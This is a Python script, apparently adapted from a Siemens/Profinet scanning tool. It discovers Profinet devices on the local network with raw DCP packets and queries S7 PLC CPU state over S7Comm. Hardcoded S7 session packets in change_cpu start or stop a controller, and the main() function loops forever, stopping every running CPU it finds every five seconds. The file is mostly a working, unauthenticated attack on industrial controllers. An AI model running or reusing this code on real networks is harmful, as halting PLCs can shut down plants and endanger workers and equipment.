485 lines
22 KiB
Python
485 lines
22 KiB
Python
#! /usr/bin/env python3
|
|
r"""
|
|
Copyright 2022 Photubias(c)
|
|
|
|
This program is free software: you can redistribute it and/or modify
|
|
it under the terms of the GNU General Public License as published by
|
|
the Free Software Foundation, either version 3 of the License, or
|
|
(at your option) any later version.
|
|
|
|
This program is distributed in the hope that it will be useful,
|
|
but WITHOUT ANY WAR
|
|
RANTY; without even the implied warranty of
|
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
GNU General Public License for more details.
|
|
|
|
You should have received a copy of the GNU General Public License
|
|
along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
|
|
(Buggy) Linux implementation of this script: https://code.google.com/p/scada-tools/
|
|
python profinet_scanner.py [-i interface]
|
|
|
|
DLL Library import based on: https://code.google.com/p/winpcapy/
|
|
|
|
Prerequisites: WinPcap (Windows) or libpcap (Linux) installed
|
|
|
|
File name SiemensScan.py
|
|
written by tijl[dot]deneut[at]howest[dot]be for IC4
|
|
--- Profinet Scanner ---
|
|
It will perform a Layer2 discovery scan (PN_DCP) for Profinet devices,
|
|
then list their info (detected only via DCP)
|
|
Then give you the option to change network settings for any of them
|
|
|
|
--- Siemens Hacker ---
|
|
It also performs detailed scanning using S7Comm.
|
|
Furthermore, this script reads inputs AND writes & reads outputs.
|
|
"""
|
|
import os
|
|
import re
|
|
import socket
|
|
import string
|
|
import struct
|
|
import sys
|
|
import time
|
|
from binascii import hexlify, unhexlify
|
|
from ctypes import CDLL, POINTER, Structure, c_void_p, c_char_p, c_ushort, c_char, c_long, c_int, c_ubyte, \
|
|
byref, create_string_buffer
|
|
from ctypes.util import find_library
|
|
from multiprocessing.pool import ThreadPool
|
|
from pprint import pprint
|
|
from subprocess import Popen, PIPE
|
|
|
|
|
|
##### Classes
|
|
class Sockaddr(Structure):
|
|
_fields_ = [("sa_family", c_ushort),
|
|
("sa_data", c_char * 14)]
|
|
|
|
|
|
class PcapAddr(Structure):
|
|
pass
|
|
|
|
|
|
PcapAddr._fields_ = [('next', POINTER(PcapAddr)),
|
|
('addr', POINTER(Sockaddr)),
|
|
('netmask', POINTER(Sockaddr)),
|
|
('broadaddr', POINTER(Sockaddr)),
|
|
('dstaddr', POINTER(Sockaddr))]
|
|
|
|
|
|
class PcapIf(Structure):
|
|
pass
|
|
|
|
|
|
PcapIf._fields_ = [('next', POINTER(PcapIf)),
|
|
('name', c_char_p),
|
|
('description', c_char_p),
|
|
('addresses', POINTER(PcapAddr)),
|
|
('flags', c_int)]
|
|
|
|
|
|
class Timeval(Structure):
|
|
pass
|
|
|
|
|
|
Timeval._fields_ = [('tv_sec', c_long),
|
|
('tv_usec', c_long)]
|
|
|
|
|
|
class PcapPkthdr(Structure):
|
|
_fields_ = [('ts', Timeval),
|
|
('caplen', c_int),
|
|
('len', c_int)]
|
|
|
|
|
|
##### Initialize Pcap
|
|
if os.name == 'nt':
|
|
try:
|
|
os.chdir('C:/Windows/System32/Npcap')
|
|
_lib = CDLL('wpcap.dll')
|
|
except:
|
|
print('Error: WinPcap/Npcap not found!')
|
|
print('Please download here: https://nmap.org/npcap/')
|
|
input('Press [Enter] to close')
|
|
sys.exit(1)
|
|
else:
|
|
pcaplibrary = find_library('pcap')
|
|
if pcaplibrary is None or str(pcaplibrary) == '':
|
|
print('Error: Pcap library not found!')
|
|
print('Please install with: e.g. apt install libpcap0.8')
|
|
input('Press [Enter] to close')
|
|
sys.exit(1)
|
|
_lib = CDLL(pcaplibrary)
|
|
|
|
## match DLL function to list all devices
|
|
pcap_findalldevs = _lib.pcap_findalldevs
|
|
pcap_findalldevs.restype = c_int
|
|
pcap_findalldevs.argtypes = [POINTER(POINTER(PcapIf)), c_char_p]
|
|
## match DLL function to open a device: char *device, int snaplen, int prmisc, int to_ms, char *ebuf
|
|
## snaplen - maximum size of packets to capture in bytes
|
|
## promisc - set card in promiscuous mode?
|
|
## to_ms - time to wait for packets in miliseconds before read times out
|
|
## errbuf - if something happens, place error string here
|
|
pcap_open_live = _lib.pcap_open_live
|
|
pcap_open_live.restype = POINTER(c_void_p)
|
|
pcap_open_live.argtypes = [c_char_p, c_int, c_int, c_int, c_char_p]
|
|
## match DLL function to send a raw packet: pcap device handle, packetdata, packetlength
|
|
pcap_sendpacket = _lib.pcap_sendpacket
|
|
pcap_sendpacket.restype = c_int
|
|
pcap_sendpacket.argtypes = [POINTER(c_void_p), POINTER(c_ubyte), c_int]
|
|
## match DLL function to close a device
|
|
pcap_close = _lib.pcap_close
|
|
pcap_close.restype = None
|
|
pcap_close.argtypes = [POINTER(c_void_p)]
|
|
## match DLL function to get error message
|
|
pcap_geterr = _lib.pcap_geterr
|
|
pcap_geterr.restype = c_char_p
|
|
pcap_geterr.argtypes = [POINTER(c_void_p)]
|
|
## match DLL function to get next packet
|
|
pcap_next_ex = _lib.pcap_next_ex
|
|
pcap_next_ex.restype = c_int
|
|
pcap_next_ex.argtypes = [POINTER(c_void_p), POINTER(POINTER(PcapPkthdr)), POINTER(POINTER(c_ubyte))]
|
|
|
|
##### Variables
|
|
iDiscoverTimeout = 2
|
|
|
|
|
|
##### Functions
|
|
def get_all_interfaces():
|
|
def add_to_arr(array, adapter, ip, mac, device, winguid):
|
|
if len(mac) == 17: # When no or bad MAC address (e.g. PPP adapter), do not add
|
|
array.append([adapter, ip, mac, device, winguid])
|
|
return array
|
|
|
|
# Returns twodimensional array of interfaces in this sequence for each interface:
|
|
# [0] = adaptername (e.g. Ethernet or eth0)
|
|
# [1] = Current IP (e.g. 192.168.0.2)
|
|
# [2] = Current MAC (e.g. ff:ee:dd:cc:bb:aa)
|
|
# [3] = Devicename (e.g. Intel 82575LM, Windows only)
|
|
# [4] = DeviceGUID (e.g. {875F7EDB-CA23-435E-8E9E-DFC9E3314C55}, Windows only)
|
|
interfaces = []
|
|
if os.name == 'nt': # This should work on Windows
|
|
proc = Popen("getmac /NH /V /FO csv | FINDSTR /V disconnected", shell=True, stdout=PIPE)
|
|
for interface in proc.stdout.readlines():
|
|
intarr = interface.decode().split(',')
|
|
adapter = intarr[0].replace('"', '')
|
|
devicename = intarr[1].replace('"', '')
|
|
mac = intarr[2].replace('"', '').lower().replace('-', ':')
|
|
winguid = intarr[3].replace('"', '').replace('\n', '').replace('\r', '')[-38:]
|
|
proc = Popen('netsh int ip show addr "' + adapter + '" | FINDSTR /I IP', shell=True, stdout=PIPE)
|
|
try:
|
|
ip = re.findall(r'[0-9]+(?:\.[0-9]+){3}',
|
|
proc.stdout.readlines()[0].decode(errors='ignore').replace(' ', ''))[0]
|
|
except:
|
|
ip = ''
|
|
interfaces = add_to_arr(interfaces, adapter, ip, mac, devicename, winguid)
|
|
|
|
else: # And this on any Linux
|
|
# proc=Popen("for i in `ifconfig -a | grep \"Link encap:\" | awk '{print $1}'`;do echo \"$i `ifconfig $i | sed 's/inet addr:/inet addr: /' | grep \"inet addr:\" | awk '{print $3}'` `ifconfig $i | grep HWaddr | awk '{print $5}'`\" | sed '/lo/d';done", shell=True, stdout=PIPE)
|
|
proc = Popen(
|
|
"for i in $(ip address | grep -v \"lo\" | grep \"default\" | cut -d\":\" -f2 | cut -d\" \" -f2);do echo $i $(ip address show dev $i | grep \"inet \" | cut -d\" \" -f6 | cut -d\"/\" -f1) $(ip address show dev $i | grep \"ether\" | cut -d\" \" -f6);done",
|
|
shell=True, stdout=PIPE)
|
|
for interface in proc.stdout.readlines():
|
|
intarr = interface.decode().split(' ')
|
|
if len(intarr) < 3: continue ## Device has no MAC address, L2 scanning not an option
|
|
interfaces = add_to_arr(interfaces, intarr[0], intarr[1], intarr[2].replace('\n', ''), '', '')
|
|
|
|
return interfaces
|
|
|
|
|
|
## Expects sData like this 01020304050607 and returns bytearray
|
|
def create_packet(s_data):
|
|
b_hex_data = unhexlify(s_data)
|
|
arr_byte_packet = (c_ubyte * len(b_hex_data))()
|
|
b = bytearray()
|
|
b.extend(b_hex_data)
|
|
for i in range(0, len(b_hex_data)): arr_byte_packet[i] = b[i]
|
|
return arr_byte_packet
|
|
|
|
|
|
## Actually sends a packet
|
|
def send_raw_packet(b_npfdevice, s_ethertype, s_srcmac, bool_set_network=False, s_network_data_to_set='', s_dstmac=''):
|
|
if s_ethertype == '88cc': # LLDP Packet
|
|
s_dstmac = '0180c200000e'
|
|
s_data = '0210077365727665722d6e6574776f726b6d040907706f72742d303031060200140a0f5345525645522d4e4554574f524b4d0c60564d776172652c20496e632e20564d77617265205669727475616c20506c6174666f726d2c4e6f6e652c564d776172652d34322033362036642039622034302062642038642038302d66302037362061312066302035332030392039352032370e040080008010140501ac101e660200000001082b0601040181c06efe08000ecf0200000000fe0a000ecf05005056b6feb6fe0900120f0103ec0300000000'
|
|
elif s_ethertype == '8100': # PN-DCP, Profinet Discovery Packet, sEthertype '8100'
|
|
s_dstmac = '010ecf000000'
|
|
s_data = '00008892fefe05000400000300800004ffff00000000000000000000000000000000000000000000000000000000'
|
|
elif s_ethertype == '8892' and bool_set_network:
|
|
## Create packet to set networkdata, expect data in hexstring
|
|
s_data = (
|
|
'fefd 04 00 04000001 0000 0012 0102 000e 0001' + s_network_data_to_set + '0000 0000 0000 0000 0000 0000').replace(
|
|
' ', '') # Working
|
|
elif s_ethertype == '8892' and not bool_set_network:
|
|
## Create custom packet with 'networkDataToSet' as the data (including length) and dstmac as dstmac
|
|
s_data = s_network_data_to_set
|
|
|
|
## Get packet as a bytearray
|
|
arr_byte_packet = create_packet(s_dstmac + s_srcmac + s_ethertype + s_data)
|
|
|
|
## Send the packet
|
|
buf_errbuf = create_string_buffer(256)
|
|
handle_pcap_dev = pcap_open_live(b_npfdevice, 65535, 1, 1000,
|
|
buf_errbuf) ## Device, max packet size, promiscuous mode, time limit in ms, buffer for errors
|
|
if not bool(handle_pcap_dev):
|
|
print('\nError: Please use sudo!\n')
|
|
# else: print('\nUnable to open the adapter. %s is not supported by Pcap\n' % interfaces[int(answer - 1)][0])
|
|
sys.exit(1)
|
|
|
|
if pcap_sendpacket(handle_pcap_dev, arr_byte_packet, len(arr_byte_packet)) != 0:
|
|
print('\nError sending the packet: %s\n' % pcap_geterr(handle_pcap_dev))
|
|
sys.exit(1)
|
|
|
|
pcap_close(handle_pcap_dev)
|
|
return arr_byte_packet
|
|
|
|
|
|
## Receive packets, expect device to receive on, src mac address + ethertype to filter on and timeout in seconds
|
|
def receive_raw_packets(b_npfdevice, i_timeout, s_srcmac, s_ethertype, stop_on_receive=False):
|
|
arr_received_raw_data = []
|
|
buf_errbuf = create_string_buffer(256)
|
|
handle_pcap_dev = pcap_open_live(b_npfdevice, 65535, 1, 1000,
|
|
buf_errbuf) ## Device, max packet size, promiscuous mode, time limit in ms, buffer for errors
|
|
if not bool(handle_pcap_dev):
|
|
print('\nUnable to open the adapter. {} is not supported by Pcap\n'.format(b_npfdevice))
|
|
sys.exit(1)
|
|
|
|
ptr_header = POINTER(PcapPkthdr)()
|
|
ptr_pkt_data = POINTER(c_ubyte)()
|
|
i_receivedpacket = pcap_next_ex(handle_pcap_dev, byref(ptr_header), byref(ptr_pkt_data))
|
|
## Regular handler, loop until told otherwise (or with timer)
|
|
fl_timer = time.time() + int(i_timeout)
|
|
i = 0
|
|
while i_receivedpacket >= 0:
|
|
i_timeleft = int(round(fl_timer - time.time(), 0))
|
|
status('Received packets: %s, time left: %i \r' % (str(i), i_timeleft))
|
|
if i_timeleft <= 0: break ## PCAP networkstack timeout elapsed or regular timeout
|
|
lst_rawdata = ptr_pkt_data[0:ptr_header.contents.len]
|
|
s_packettype = hexlify(bytearray(lst_rawdata[12:14])).decode().lower()
|
|
s_targetmac = hexlify(bytearray(lst_rawdata[:6])).decode().lower()
|
|
if s_packettype == s_ethertype.lower() and s_srcmac.lower() == s_targetmac:
|
|
# print('Succes! Found an %s packet.' % sEthertype)
|
|
arr_received_raw_data.append(lst_rawdata)
|
|
if stop_on_receive: break
|
|
|
|
## Load next packet
|
|
i_receivedpacket = pcap_next_ex(handle_pcap_dev, byref(ptr_header), byref(ptr_pkt_data))
|
|
i += 1
|
|
pcap_close(handle_pcap_dev)
|
|
return arr_received_raw_data
|
|
|
|
|
|
## Parsing the Raw PN_DCP data on discovery (source: https://code.google.com/p/scada-tools/source/browse/profinet_scanner.py)
|
|
## Returns type_of_station, name_of_station, vendor_id, device_id, device_role, ip_address, subnet_mask, standard_gateway
|
|
def parse_response(s_hexdata, s_mac):
|
|
arr_device = {
|
|
'mac_address': s_mac,
|
|
'type_of_station': 'None',
|
|
'name_of_station': 'None',
|
|
'vendor_id': 'None',
|
|
'device_id': 'None',
|
|
'device_role': 'None',
|
|
'ip_address': 'None',
|
|
'subnet_mask': 'None',
|
|
'standard_gateway': 'None',
|
|
'hardware': None,
|
|
'firmware': None,
|
|
}
|
|
## Since this is the parse of a DCP identify response, data should start with feff (Profinet FrameID 0xFEFF)
|
|
if not str(s_hexdata[:4]).lower() == 'feff':
|
|
print('Error: this data is not a proper DCP response?')
|
|
return arr_device
|
|
|
|
data_to_parse = s_hexdata[24:] # (Static) offset to where first block starts
|
|
while len(data_to_parse) > 0:
|
|
## Data is divided into blocks, where block length is set at byte 2 & 3 (so offset [4:8]) of the block
|
|
block_length = int(data_to_parse[2 * 2:4 * 2], 16)
|
|
block = data_to_parse[:(4 + block_length) * 2]
|
|
|
|
## Parse the block
|
|
block_id = str(block[:2 * 2])
|
|
if block_id == '0201':
|
|
arr_device['type_of_station'] = str(unhexlify(block[4 * 2:4 * 2 + block_length * 2]))[2:-1].replace(r'\x00',
|
|
'')
|
|
elif block_id == '0202':
|
|
arr_device['name_of_station'] = str(unhexlify(block[4 * 2:4 * 2 + block_length * 2]))[2:-1].replace(r'\x00',
|
|
'')
|
|
elif block_id == '0203':
|
|
arr_device['vendor_id'] = str(block[6 * 2:8 * 2])
|
|
arr_device['device_id'] = str(block[8 * 2:10 * 2])
|
|
elif block_id == '0204':
|
|
arr_device['device_role'] = str(block[6 * 2:7 * 2])
|
|
devrole = ''
|
|
|
|
elif block_id == '0102':
|
|
arr_device['ip_address'] = socket.inet_ntoa(struct.pack(">L", int(block[6 * 2:10 * 2], 16)))
|
|
arr_device['subnet_mask'] = socket.inet_ntoa(struct.pack(">L", int(block[10 * 2:14 * 2], 16)))
|
|
arr_device['standard_gateway'] = socket.inet_ntoa(struct.pack(">L", int(block[14 * 2:18 * 2], 16)))
|
|
|
|
## Maintain the loop
|
|
padding = block_length % 2 # Will return 1 if odd
|
|
data_to_parse = data_to_parse[(4 + block_length + padding) * 2:]
|
|
|
|
return arr_device
|
|
|
|
|
|
def status(msg):
|
|
sys.stderr.write(msg)
|
|
sys.stderr.flush()
|
|
|
|
|
|
def send_and_recv(sock, strdata, sendOnly=False):
|
|
data = unhexlify(strdata.replace(' ', '').lower()) ## Convert to real HEX (\x00\x00 ...)
|
|
sock.send(data)
|
|
if sendOnly: return
|
|
ret = sock.recv(65000)
|
|
return ret
|
|
|
|
|
|
def get_cpu(device):
|
|
s_statee = 'Running'
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
sock.settimeout(1) # 1 second timeout
|
|
try:
|
|
sock.connect((device['ip_address'], 102)) ## Will setup TCP/SYN with port 102
|
|
except:
|
|
return 'Unknown'
|
|
# Firstly: the COTP Connection Request (CR), should result in Connection Confirm (CC)
|
|
## TPKT header + COTP CR TPDU with src-ref 0x0005 (gets response with dst-ref 0x0005)
|
|
cotpconnectresponse = hexlify(send_and_recv(sock, '03000016' + '11e00000001d00c1020100c2020100c0010a')).decode(
|
|
errors='ignore')
|
|
## Response should be 03000016 11d00005001000c0010ac1020600c2020600
|
|
if not cotpconnectresponse[10:12] == 'd0':
|
|
print('COTP Connection Request failed')
|
|
return ''
|
|
##---- S7 Setup Comm ------------
|
|
## TPKT header + COTP header + S7 data (which is: Header -Job- + Parameter -Setup-)
|
|
s7setupdata = '32010000020000080000' + 'f0000001000101e0'
|
|
tpktlength = str(hex(int((len(s7setupdata) + 14) / 2)))[2:]
|
|
s7setup = send_and_recv(sock, '030000' + tpktlength + '02f080' + s7setupdata)
|
|
##---- S7 Request CPU -----------
|
|
s7readdata = '3207000005000008 000800011204 11440100ff09000404240001'
|
|
tpktlength = str(hex(int((len(s7readdata.replace(' ', '')) + 14) / 2)))[2:]
|
|
s7read = send_and_recv(sock, '030000' + tpktlength + '02f080' + s7readdata)
|
|
if hexlify(s7read[44:45]).decode(errors='ignore') == '03': s_statee = 'Stopped'
|
|
sock.close()
|
|
return s_statee
|
|
|
|
|
|
def change_cpu(device):
|
|
cur_state = get_cpu(device)
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
sock.settimeout(1)
|
|
sock.connect((device['ip_address'], 102)) ## Will setup TCP/SYN with port 102
|
|
## CR TPDU
|
|
send_and_recv(sock, '03000016' + '11e00000002500c1020600c2020600c0010a')
|
|
## 'SubscriptionContainer'
|
|
sResp = hexlify(send_and_recv(sock,
|
|
'030000c0' + '02f080' + '720100b131000004ca0000000200000120360000011d00040000000000a1000000d3821f0000a3816900151653657276657253657373696f6e5f4536463534383534a3822100150b313a3a3a362e303a3a3a12a3822800150d4f4d532b204465627567676572a38229001500a3822a001500a3822b00048480808000a3822c001211e1a300a3822d001500a1000000d3817f0000a38169001515537562736372697074696f6e436f6e7461696e6572a2a20000000072010000')).decode(
|
|
errors='ignore')
|
|
s_sid = str(hex(int('0' + sResp[48:50], 16) + int('80', 16))).replace('0x', '')
|
|
if len(s_sid) % 2 == 1: s_sid = '0' + s_sid
|
|
# print('Using SID ' + sSID)
|
|
if cur_state == 'Stopped': ## Will perform start
|
|
send_and_recv(sock,
|
|
'03000078' + '02f080' + '72020069310000054200000003000003' + s_sid + '34000003 ce 010182320100170000013a823b00048140823c00048140823d000400823e00048480c040823f0015008240001506323b313035388241000300030000000004e88969001200000000896a001300896b000400000000000072020000')
|
|
else:
|
|
send_and_recv(sock,
|
|
'03000078' + '02f080' + '72020069310000054200000003000003' + s_sid + '34000003 88 010182320100170000013a823b00048140823c00048140823d000400823e00048480c040823f0015008240001506323b313035388241000300030000000004e88969001200000000896a001300896b000400000000000072020000')
|
|
send_and_recv(sock,
|
|
'0300002b' + '02f080' + '7202001c31000004bb00000005000003' + s_sid + '34000000010000000000000000000072020000')
|
|
send_and_recv(sock,
|
|
'0300002b' + '02f080' + '7202001c31000004bb00000006000003' + s_sid + '34000000020001010000000000000072020000')
|
|
runloop = True
|
|
print('--- Getting data ---')
|
|
while runloop:
|
|
try:
|
|
response = sock.recv(65000)
|
|
except:
|
|
runloop = False
|
|
try:
|
|
send_and_recv(sock,
|
|
'03000042' + '02f080' + '7202003331000004fc00000007000003' + s_sid + '360000003402913d9b1e000004e88969001200000000896a001300896b00040000000000000072020000')
|
|
except:
|
|
sock.close()
|
|
return False
|
|
if cur_state == 'Stopped': ## Will perform start
|
|
send_and_recv(sock,
|
|
'03000043' + '02f080' + '7202003431000004f200000008000003' + s_sid + '36000000340190770008 03 000004e88969001200000000896a001300896b00040000000000000072020000')
|
|
else:
|
|
send_and_recv(sock,
|
|
'03000043' + '02f080' + '7202003431000004f200000008000003' + s_sid + '36000000340190770008 01 000004e88969001200000000896a001300896b00040000000000000072020000')
|
|
send_and_recv(sock,
|
|
'0300003d' + '02f080' + '7202002e31000004d40000000a000003' + s_sid + '34000003d000000004e88969001200000000896a001300896b000400000000000072020000')
|
|
|
|
sock.close()
|
|
return True
|
|
|
|
|
|
def scan_network(s_adapter, s_macaddr, s_winguid):
|
|
## We use Pcap, so we need the Pcap device (for Windows: \Device\NPF_{GUID}, for Linux: 'eth0')
|
|
if os.name == 'nt': s_adapter = r'\Device\NPF_' + s_winguid
|
|
# print('Using adapter ' + sAdapter + '\n')
|
|
b_npfdevice = s_adapter.encode()
|
|
|
|
## Start building discovery packet
|
|
print('Building packet')
|
|
|
|
## Sending the raw packet (packet itself is returned) (8100 == PN_DCP, 88cc == LDP)
|
|
packet = send_raw_packet(b_npfdevice, '8100', s_macaddr)
|
|
print('\nPacket has been sent (' + str(len(packet)) + ' bytes)')
|
|
|
|
## Receiving packets as bytearr (88cc == LDP, 8892 == device PN_DCP)
|
|
print('\nReceiving packets over ' + str(iDiscoverTimeout) + ' seconds ...\n')
|
|
received_data_arr = receive_raw_packets(b_npfdevice, iDiscoverTimeout, s_macaddr, '8892')
|
|
print()
|
|
print('\nSaved ' + str(len(received_data_arr)) + ' packets')
|
|
print()
|
|
return received_data_arr, b_npfdevice
|
|
|
|
|
|
def parse_data(received_data_arr):
|
|
# print('These are the devices detected ({}):'.format(len(receivedDataArr)))
|
|
# print('{0:17} | {1:20} | {2:20} | {3:15} | {4:9}'.format('MAC address', 'Device', 'Device Type', 'IP Address', 'Vendor ID'))
|
|
lst_devices = []
|
|
for packet in received_data_arr:
|
|
s_hexdata = hexlify(bytearray(packet))[28:].decode(errors='ignore') # take off ethernet header
|
|
## Parse function returns type_of_station, name_of_station, vendor_id, device_id, device_role, ip_address, subnet_mask, standard_gateway
|
|
## takes 'translate' as a parameter, which will add these parsings:
|
|
## (vendor id 002a == siemens) (device id 0a01=switch, 0202=simulator, 0203=s7-300 CP, 0101=s7-300 ...)
|
|
## (0x01==IO-Device, 0x02==IO-Controller, 0x04==IO-Multidevice, 0x08==PN-Supervisor), (0000 0001, 0000 0010, 0000 0100, 0000 1000)
|
|
## Getting MAC address from packet, formatting with ':' in between
|
|
s_mac = ':'.join(re.findall('(?s).{,2}', str(hexlify(bytearray(packet)).decode(errors='ignore')[6 * 2:12 * 2])))[
|
|
:-1]
|
|
arr_result = parse_response(s_hexdata, s_mac)
|
|
lst_devices.append(arr_result)
|
|
# sDevicename = str(arrResult['name_of_station'])
|
|
# if sDevicename == '': sDevicename = str(arrResult['type_of_station'])
|
|
# print('{0:17} | {1:20} | {2:20} | {3:15} | {4:9}'.format(sMac, sDevicename, arrResult['type_of_station'], arrResult['ip_address'], arrResult['vendor_id']))
|
|
return lst_devices
|
|
|
|
|
|
def main():
|
|
interfaces = get_all_interfaces()
|
|
s_adapter = interfaces[0][0] # eg: 'Ethernet 2'
|
|
s_macaddr = interfaces[0][2].replace(':', '') # eg: 'ab58e0ff585a'
|
|
s_winguid = interfaces[0][4] # eg: '{875F7EDB-CA23-435E-8E9E-DFC9E3314C55}'
|
|
|
|
|
|
while True:
|
|
received_data_arr, b_npfdevice = scan_network(s_adapter, s_macaddr, s_winguid)
|
|
lst_devices = parse_data(received_data_arr)
|
|
print(f"Found {len(lst_devices)} devices")
|
|
for lst_device in lst_devices:
|
|
pprint(lst_device)
|
|
print("Stopping all CPUs")
|
|
for device in lst_devices:
|
|
current_state = get_cpu(device)
|
|
if current_state == 'Running':
|
|
change_cpu(device)
|
|
time.sleep(5)
|
|
|
|
|
|
if __name__ == '__main__':
|
|
main()
|